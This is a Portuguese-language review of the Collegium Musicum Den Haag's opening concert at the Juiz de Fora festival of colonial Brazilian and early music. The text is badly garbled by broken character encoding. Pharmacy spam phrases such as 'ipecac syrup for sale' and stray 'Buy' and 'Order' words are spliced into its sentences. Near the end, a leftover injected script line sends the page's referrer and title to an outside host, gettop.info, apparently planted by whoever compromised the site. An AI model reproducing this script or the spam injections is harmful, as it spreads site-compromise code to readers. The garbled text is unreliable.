CríticaFestivalLateralMinas GeraisMúsica de câmara

LiA�A?o de mA?sica

Collegium Musicum Den Haag dA? aula de mA?sica barroca no concerto de abertura do Festival Internacional de MA?sica Colonial Brasileira e MA?sica Antiga de Juiz de Fora. ipecac syrup for sale

 

O belo prA�dio art dA�co do Cine-Theatro Central de Juiz de Fora, inaugurado em 30 de marA�o de 1929, foi cenA?rio colorido e iluminado para o concerto de abertura do 27A? Festival Internacional de MA?sica Colonial Brasileira e MA?sica Antiga. Na noite de 24 de julho, apresentou-se o conjunto holandA?s Buy Collegium Musicum Den Haag.

Criado em 2006 em Haia, na Holanda, pelo cravista A�talo-brasileiro Claudio Ribeiro (diretor artA�stico e maestro al cembalo), o Collegium Musicum Den Haag se inspira nos Collegia Musica do passado e reA?ne jovens instrumentistas de diversas nacionalidades. O conjunto A� considerado uma das principais orquestras da “nova geraA�A?o” europeia.

As longas filas que se formavam A�s portas do Cine-Theatro deram lugar a uma linda plateia lotada de 1.300 pessoas educadas e verdadeiramente interessadas por mA?sica a�� algumas das quais haviam inclusive assistido anteriormente A� palestra preparatA?ria ministrada por Rodolfo Valverde, professor de HistA?ria da MA?sica do Instituto de Artes de Design da Universidade Federal de Juiz de Fora.

A plateia no Cine-Theatro Central
A plateia no Cine-Theatro Central

 

Os aplausos alegres saudaram a entrada em cena (pela primeira vez no Brasil) dos 15 mA?sicos do Collegium Musicum Den Haag: Cynthia Miller Freivogel, Diana Lee, Daniel Boothe, Yotam Gaton, Agnieszka Papierska e Ryuko Reid nos violinos barrocos; Zdenka Prochazkova na viola barroca; Anton Baba no violoncelo barroco; Silvia Jimenez Soriano no contrabaixo barroco; InA?s d’Avena na flauta doce (que forma, com Claudio, o Duo Lotus, que se apresenta no Festival no dia 29, A�s 20h, na Igreja do RosA?rio); Isabel Favilla na flauta doce e no fagote barroco; Diego Nadra (substituindo PA�ter TA?bori) e Robert de Bree nos oboA�s barrocos; Giulio Quirici na teorba; e, ao cravo e na regA?ncia, Claudio Ribeiro.

O conjunto preparou um repertA?rio baseado em seu CD L’Europe RA�unie (2007), no qual apresenta obras dos principais compositores barrocos europeus, revelando a mistura de estilos vigentes na A�poca, entre os quais se destacam o francA?s (mais contido e elegante), o italiano (ornamentado e operA�stico) e o alemA?o (posterior, com elementos dos dois outros estilos).

 

Preciosidades

A� de um alemA?o a obra escolhida para abrir o concerto: trA?s movimentos (Overture, Napolitaine e Musette) da SuA�te La Musette TWV 55:g1, de Georg Phillip Telemann (1681-1767). JA? na primeira peA�a revelou-se a profunda integraA�A?o e harmonia entre os mA?sicos do conjunto, que foi marcada tambA�m pelos intensos contrastes entre piano e forte. Vale notar que a disposiA�A?o dos mA?sicos no palco criou interessante efeito surround barroco.

Com talento e alegria, os mA?sicos executaram o Concerto em rA� menor, RV 566, de Antonio Vivaldi (1678-1741). As brasileiras InA?s d’Avena e Isabel Favilla encantaram com suas flautas doces, que realizaram delicioso diA?logo com o Purchase tutti a�� no segundo movimento ( Order Largo how to purchase ginseng ), a conversa era com a teorba, uma espA�cie de alaA?de de enorme braA�o surgido no final do sA�culo 16, tocada com graA�a pelo italiano Buy Giulio Quirici. Loas tambA�m A�s vibrantes intervenA�A�es dos violinos barrocos das norte-americanas Cynthia Miller Freivogel e Diana Lee.

Veio em seguida o Concerto em rA� menor, Op. 2 n. 1 (conhecido como Concerti a quattro da chiesa), de Evaristo Felice dall’Abaco (1675-1742). Mais uma vez, foi notA?vel a impressionante clareza e a execuA�A?o precisa e limpA�ssima dos jovens artistas do Collegium Musicum Den Haag a�� caracterA�sticas fundamentais para a beleza das obras do perA�odo barroco.

Collegium Musicum Den Haag no palco
Collegium Musicum Den Haag no palco

 

As duas flautistas solistas voltaram ao centro do palco para a execuA�A?o de uma obra de uma majestade da mA?sica: Johann Sebastian Bach (1685-1750) e seu Concerto para cravo em fA? maior, BWV 1057. No centro da mA?sica, o bem-temperado instrumento de Claudio Ribeiro, do qual saA�ram belos ornamentos.

De Johann Adolf Hasse (1699-1783) a�� pouco executado compositor alemA?o que fez a ponte para o Classicismo de Haydn e Mozart a�� foi tocada a Order Sinfonia em sol menor, Op. 5 n. 6. Novas texturas e estruturas musicais emanaram dos instrumentos, que eram tocados com “pegada” diferente, revelando o respeito ao estilo nascente.

Finalizando o delicioso concerto, a alegre e danA�ante Fantaisie, de Jean-FA�ry Rebel (1666-1747). Seus cinco movimentos contA�nuos (Grave, Chaconne, Loure, Tambourin e Chaconne) sA?o um convite A� celebraA�A?o.

Entre mA?sicos sorridentes e seus sons adorA?veis, o Collegium Musicum Den Haag demonstrou visA�vel respeito ao estilo barroco e ao que se presume como intenA�A?o do compositor a�� alA�m de profundos conhecimentos musicais e talento de sobra. Uma verdadeira e agradabilA�ssima aula de mA?sica.

 

ranitidine cost uk Saiba mais sobre o Festival Internacional de MA?sica Colonial Brasileira e MA?sica Antiga de Juiz de Fora.

Fotos: Twin Alvarenga

Fabiano GonA�alves viajou a convite da organizaA�A?o do evento.

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fabiano Gonçalves
Publicitário e roteirista (formado no Maurits Binger Film Institute - Amsterdã). Corroteirista do longa O Amor Está no Ar e de programas de TV (novela Chiquititas - 1998/2000). Redator na revista SuiGeneris, no site Escola24horas e no Departamento Nacional do Senac. Um dos fundadores do movimento.com, escreve também sobre televisão para o site teledossie.com.br. - E-mail: fabiano@movimento.com